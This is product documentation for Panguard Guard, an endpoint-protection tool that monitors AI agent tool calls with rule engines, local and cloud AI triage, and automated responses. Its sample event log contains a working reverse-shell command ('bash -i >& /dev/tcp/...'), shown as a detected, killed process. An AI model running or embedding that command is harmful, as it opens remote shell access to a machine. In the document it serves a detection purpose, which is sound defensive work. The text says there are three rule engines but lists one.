Panguard Guard
Real-time endpoint protection powered by a 5-agent AI pipeline. Guard monitors AI agent tool calls, prompt flows, and skill behavior 24/7 using ATR (Agent Threat Rules) backed by a three-layer AI analysis funnel.
Quick Start
panguard guard start
panguard guard status
panguard guard stop
By default, Guard starts in monitor mode. It logs threats but does not take automated action until you switch to protect mode.
5-Agent Pipeline
Every event flows through five specialised agents in sequence. Each agent enriches the event context before passing it to the next.
| Agent | Role | Description |
|---|---|---|
| Detect | Rule matching | Runs ATR rules against incoming telemetry. Produces raw alerts with severity and confidence scores. |
| Analyze | AI triage | Escalates ambiguous alerts through the three-layer AI funnel. Adjusts confidence scores and adds contextual reasoning. |
| Respond | Action execution | Selects and executes response actions based on confidence thresholds: auto-act, confirm, or notify. |
| Report | Structured logging | Writes JSONL event records, generates daily summaries, and pushes notifications to configured channels. |
| Chat | Interactive query | Natural-language interface for investigating past events, tuning rules, and asking follow-up questions about alerts. |
Detection Engines
Guard ships with three rule engines. All rules are updated automatically via the Panguard rule feed.
| Engine | Rules | Scope |
|---|---|---|
| ATR | 311 | Agent Threat Rules. Purpose-built for AI agent security: prompt injection, tool poisoning, MCP server abuse, credential exfiltration, context manipulation, and skill supply-chain attacks. |
Three-Layer AI Funnel
Not every alert needs cloud-scale AI. The funnel resolves the vast majority of events locally, keeping latency low and costs predictable.
Layer 1: Rules
ATR rules resolve clear-cut matches. No AI involved.
Layer 2: Local AI (Ollama)
Ambiguous alerts are analysed by a local LLM running on-device via Ollama. No data leaves the machine.
Layer 3: Cloud AI
Complex, multi-signal events are escalated to cloud AI for deep reasoning and cross-tenant intelligence.
Response Actions
Guard supports six response actions. In protect mode, the Respond agent selects actions automatically based on confidence thresholds.
| Action | Description |
|---|---|
| block_ip | Add source IP to firewall deny list (iptables / pf). |
| kill_process | Terminate the offending process tree immediately. |
| quarantine_file | Move file to quarantine directory and strip execute permissions. |
| alert | Send notification via configured channels (Slack, email, webhook). |
| snapshot | Capture full process state, environment, and open file handles for forensics. |
| escalate | Forward event to SOC / human analyst for manual triage. |
Confidence Thresholds
Configuration
View and modify Guard configuration interactively:
panguard guard config
Key Options
| Option | Values | Default | Description |
|---|---|---|---|
| mode | monitor | protect | monitor | Monitor logs only, or actively respond to threats. |
| auto_response | true | false | false | Enable automated response actions in protect mode. |
| notification.slack | webhook URL | (none) | Slack incoming webhook for alert delivery. |
| notification.email | address | (none) | Email address for critical alert notifications. |
| notification.webhook | URL | (none) | Generic webhook endpoint for all events. |
| ai.local_model | model name | llama3.2:3b | Ollama model used for Layer 2 analysis. |
| ai.cloud_enabled | true | false | true | Allow Layer 3 cloud AI escalation. |
panguard guard config set mode protect panguard guard config set auto_response true
panguard guard config set notification.slack https://hooks.slack.com/services/T.../B.../xxx
Monitoring and Logs
Guard writes structured event logs in JSONL format. Each line is a self-contained JSON object with timestamp, severity, rule ID, and action taken.
~/.panguard-guard/events.jsonl
Verbose Output
Use the --verbose flag to stream events to stdout in real time:
panguard guard start --verbose
Event Callback Format
Each event record follows this structure:
{
"timestamp": "2026-03-08T14:32:01.442Z",
"severity": "high",
"rule_id": "atr:suspicious_shell_execution",
"engine": "atr",
"layer": 1,
"confidence": 0.94,
"action": "kill_process",
"action_status": "executed",
"process": {
"pid": 48291,
"name": "bash",
"cmdline": "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
},
"host": "prod-web-03"
}System Service
Install Guard as a system service so it starts automatically on boot. On Linux this creates a systemd unit; on macOS it creates a launchd plist.
panguard guard install
panguard guard uninstall
Both commands require root / administrator privileges. Guard will prompt for elevation if not already running as root.
Telemetry
Guard collects anonymous usage telemetry to improve rule quality and false-positive rates. No file contents, process arguments, or personally identifiable information is ever transmitted.
panguard guard start --no-telemetry
panguard guard --show-upload-data
Full details on data collection and retention are available in PRIVACY.md.
Platform Notes
| Feature | Linux | macOS | Windows |
|---|---|---|---|
| Core Guard daemon | Yes | Yes | Yes |
| ATR Rules | Yes | Yes | Yes |
| systemd service | Yes | -- | -- |
| launchd service | -- | Yes | -- |
For advanced configuration options, see the Advanced Setup Guide.
Start Protecting
Install Panguard and activate Guard in under a minute. Community plan includes full scan and Layer 1 rule-based protection at no cost.
panguard guard start